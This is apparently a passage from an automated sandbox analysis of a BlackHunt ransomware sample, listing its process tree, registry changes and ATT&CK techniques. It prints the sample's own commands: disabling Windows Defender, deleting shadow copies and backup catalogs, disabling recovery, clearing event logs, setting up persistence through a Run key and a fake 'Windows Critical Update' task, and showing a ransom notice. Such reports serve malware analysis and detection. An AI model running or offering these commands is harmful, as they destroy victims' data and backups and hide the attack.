2220 wrote to memory of 724 2220 cmd.exe 127 PID 2220 wrote to memory of 724 2220 cmd.exe 127 PID 1936 wrote to memory of 4704 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 194 PID 1936 wrote to memory of 4704 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 194 PID 1936 wrote to memory of 4532 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 130 PID 1936 wrote to memory of 4532 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 130 PID 1936 wrote to memory of 4948 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 132 PID 1936 wrote to memory of 4948 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 132 PID 1936 wrote to memory of 5124 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 134 PID 1936 wrote to memory of 5124 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 134 PID 5324 wrote to memory of 5972 5324 cmd.exe 135 PID 5324 wrote to memory of 5972 5324 cmd.exe 135 PID 1936 wrote to memory of 4580 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 137 PID 1936 wrote to memory of 4580 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 137 PID 3608 wrote to memory of 4568 3608 cmd.exe 136 PID 3608 wrote to memory of 4568 3608 cmd.exe 136 PID 1936 wrote to memory of 5188 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 142 PID 1936 wrote to memory of 5188 1936 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe 142 PID 6120 wrote to memory of 5676 6120 cmd.exe 139 PID 6120 wrote to memory of 5676 6120 cmd.exe 139 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe"C:\Users\Admin\AppData\Local\Temp\74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1936 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5828 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5760 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:5208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5460 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:6028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5236 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2640
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:3888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:5480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:6120 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:5676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5324 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:5972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4704
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4532
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:5608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4948
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:5124
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4580
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:5300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:512
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:5188
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2444
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:7512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3564
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:4856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:3676
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:7660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1120
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1676
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:8228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:3504
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:9664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:6104
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:7292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe" /F2⤵PID:916
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe" /F3⤵
- Creates scheduled task(s)
PID:7836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1916
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:10072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:5008
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:6328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:6056
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4500
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:9940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4824
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2504
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:9336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2152
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:9352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4308
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:10312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3464
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:11000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1704
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:5804
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:8628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:11176
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:5276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:6380
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:11428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:10932
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:10380
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:10856
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:10968
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:9184
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:828
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:8592
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:10592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:7056
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:10636
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:6376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:10752
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:9324
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:12940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:6580
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:9140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3800
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:10396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:12512
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:10076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:12576
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:10664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:12636
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:10792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:10056
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3772
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:13140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:8540 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:6536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6536 -s 14444⤵
- Program crash
PID:6452
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe"2⤵PID:10308
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:9656
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:9988
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:11152
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:7720
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:7740
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6536 -ip 65361⤵PID:7416
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
